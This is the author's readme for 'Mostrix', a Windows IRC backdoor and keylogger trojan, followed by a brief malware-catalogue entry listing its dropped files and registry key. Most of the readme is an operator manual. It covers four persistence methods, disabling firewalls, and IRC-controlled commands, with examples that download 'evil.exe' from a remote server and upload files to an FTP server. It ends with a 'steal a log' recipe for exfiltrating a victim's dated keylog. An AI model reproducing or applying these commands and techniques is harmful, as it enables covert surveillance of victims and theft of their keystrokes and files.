Mostrix

Mostrix
(Backdoor.Win32.IRCBot.dp)
by DiA
Released in June 2005

features:
		- install itself into system with 4 methods:
			> first try to copy to windows folder and do autostart registry entry
			> if Mostrix can't write to registry it edit win.ini in windows folder
			> if Mostrix can't write to windows directory it try's to copy itself
			  to startup folder
			> if it can't copy to startup folder, it edit's autoexec.bat in C:\
		- log every key event and foreground windows and save all log's
		  under current date .sys in windows directory under subdir "mslog"
		- kill some favorite firewalls and internet security suites
		- connect to irc.freenode.net and accept private commands in chan "mostrix"
		- reconnect every half hour

	commands:
		- every command is only accepted at privat chat!

		systeminfo 'temporary file path'
		ae: systeminfo 'C:\info.txt'

			> this command get some info about infected system and save it
			  in a temporary file...

		dirlist 'directory to list' 'temporary file path'
		ae: dirlist 'C:\' 'C:\C_drive_dirs.txt'

			> this command list all sub directorys in a temporary file...

		filelist 'directory to list' 'temporary file path'
		ae: filelist 'C:\' 'C:\C_drive_files.txt'

			> this command list all files in one directory and save it
			  in a temporary file...

		delete 'file to delete'
		ae: delete 'C:\C_drive_files.txt'

			> this command delete's a file, just use it to remove your
			  temporary files...

		execute 'application to execute'
		ae: execute 'C:\Windows\Notepad.exe'

			> this command executes a application, maybe one you downloaded
			  to the infected computer...

		download 'http:// url file to download' 'save path'
		ae: download 'http://server.com/user/evil.exe' 'C:\nice.exe'

			> download's a file via http protocol to local infected computer...

		upload 'file to upload' 'ftp server' 'user' 'password'
		ae: upload 'C:\info.txt' 'server.com' 'user' 'drowssap'

			> this command upload's a local file of infected computer
			  to your ftp server, name at ftp server is the same on disk...

	steal a log:
		Let's say you want a keylog from the 7. June 2005, just do so
		(imaging "Windows" is the windows directory):

			upload 'C:\Windows\mslog\070605.sys' 'server.com' 'user' 'pass'

DiA			


Server:
dropped files:
c:\WINDOWS\MStr.exe            Size: 10,240 bytes 
c:\WINDOWS\mslog\070206.sys    Size: 127 bytes 

startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "MS.trix"
data: C:\WINDOWS\MStr.exe 

attempts to connect to an IRC Server

tested on Windows XP
February 07, 2006
MegaSecurity